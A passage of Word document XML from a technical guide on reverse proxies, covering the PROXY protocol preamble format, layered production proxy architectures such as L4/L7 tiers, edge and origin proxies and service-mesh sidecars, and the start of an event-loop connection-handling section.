          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.3 The PROXY Protocol (HAProxy's Approach)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A90EF6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem with HTTP headers:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> They only work for HTTP. What about TCP connections (MySQL, Redis, SMTP)? There's no HTTP header to set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAFC423" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PROXY Protocol (v1 and v2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B046B93" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>A short preamble sent at the very beginning of the TCP connection, BEFORE any application data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339FBFB8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>v1 (text-based):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128ABD1B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F855E51" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>PROXY TCP4 1.2.3.4 10.0.0.1 56789 443\r\n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A803B64" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>[... then normal TCP data follows ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54734FCE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>v2 (binary, more efficient):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C981ED" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8A571C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>\r\n\r\n\0\r\nQUIT\n [12-byte signature]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653CAA3B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>[version|command] [family|protocol] [length]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635B8A33" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>[addresses] [optional TLVs]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D1AE87" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>[... then normal application data ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C214F62" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EF0A03" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="669"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client connects to the proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116003C3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="669"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy connects to the backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7D0E42" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="669"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>FIRST thing the proxy sends is the PROXY protocol header containing the real client's IP/port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7798B937" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="669"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Backend reads this header, records the client info, then processes the connection normally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39065882" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="669"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>The rest of the connection is transparent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437E51DC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Important:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Both the proxy AND the backend must support PROXY protocol. The backend must expect it — otherwise it'll try to parse the PROXY header as application data (and fail).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60174E92" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> HAProxy, AWS NLB (can prepend PROXY protocol), Nginx (as receiver), many TCP services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792E1539" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="6112C327">
          <v:rect id="_x0000_i3325" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F111E8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Reverse Proxy Architectures in Production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7648E831" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.1 Single-Tier Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660083D4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCE48BD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Internet → [Reverse Proxy (Nginx/Envoy)] → [Application Servers]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C943A4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Simple, works for most applications. The proxy handles TLS, caching, load balancing, compression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5434C145" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.2 Two-Tier Proxy Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E753FA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738D647A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Internet → [L4 Proxy (NLB/LVS)] → [L7 Proxy (Nginx/Envoy)] → [Application Servers]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1254812D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why two tiers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEC61B4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="670"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>L4 tier:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Handles raw TCP. Extremely high performance. Distributes across L7 instances. Provides high availability for the L7 layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6D25BC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="670"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>L7 tier:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Handles HTTP parsing, routing, caching, WAF, TLS termination. Can be horizontally scaled behind the L4 tier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4D73FD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real-world example — Kubernetes Ingress:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196790D2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352B8EF3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Internet → [AWS NLB (L4)] → [Nginx Ingress Controller pods (L7)] → [Service pods]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6317BEC4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The NLB distributes TCP connections across multiple Nginx pods. Nginx pods do the smart HTTP routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FE51C7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.3 Edge Proxy + Internal Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5793FA56" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F7942D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Internet → [Edge Proxy (CDN/Cloudflare)] → [Origin Proxy (Nginx)] → [Application]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFC6182" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Edge proxy responsibilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433585ED" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="671"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>DDoS mitigation (absorb attacks at edge).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775FBCCC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="671"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Static content caching (serve 95% of requests without hitting origin).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDAC6EF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="671"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>TLS termination at the edge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0E9D29" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="671"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Geographic routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAFFBAC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Origin proxy responsibilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2356BDCB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="672"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Backend load balancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BBD316" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="672"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Application-level routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9DD1A1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="672"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Response transformation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7FD0C7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="672"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Internal caching for dynamic content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34791A1E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.4 Multi-Proxy Microservices Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EBB0BD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E81336" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Internet → [API Gateway] ─</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve"> [Service A] (with sidecar proxy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6235BC35" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">                           </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve"> [Service B] (with sidecar proxy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428222EF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">                           └→ [Service C] (with sidecar proxy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1582FC6D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4"/>
    <w:p w14:paraId="5D1A8DA7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Service A ←sidecar→sidecar← Service B  (east-west through mesh)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB93860" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Three proxy layers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B4AC9F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="673"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>CDN/Edge proxy (global, DDoS, static caching).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684EF8E5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="673"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>API Gateway (authentication, rate limiting, external routing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AF5EAF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="673"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Sidecar proxies (service-to-service reliability, mTLS, observability).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD022DC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="27D58ABB">
          <v:rect id="_x0000_i3326" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD6301B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Connection Handling — Deep Internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D006202" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.1 How a Proxy Handles Thousands of Concurrent Connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BCDDA4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The event-driven architecture (Nginx, Envoy):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728F9A3E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>A single worker process handles thousands of connections using non-blocking I/O:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1D292C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC13F26" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>Event Loop:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA05731" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">  forever:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253DCA18" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    events = epoll_wait(fd_set, timeout)  // block until something is ready</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7EC5A6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    for each event:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70713D5B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">      if event is "new client connection":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434BB3E9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">        accept(). Add to fd_set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A41C231" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">      if event is "client data ready to read":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C3B5C1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">        read request data. If complete request → process routing logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2092CB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">      if event is "backend data ready to read":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAC3BE2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
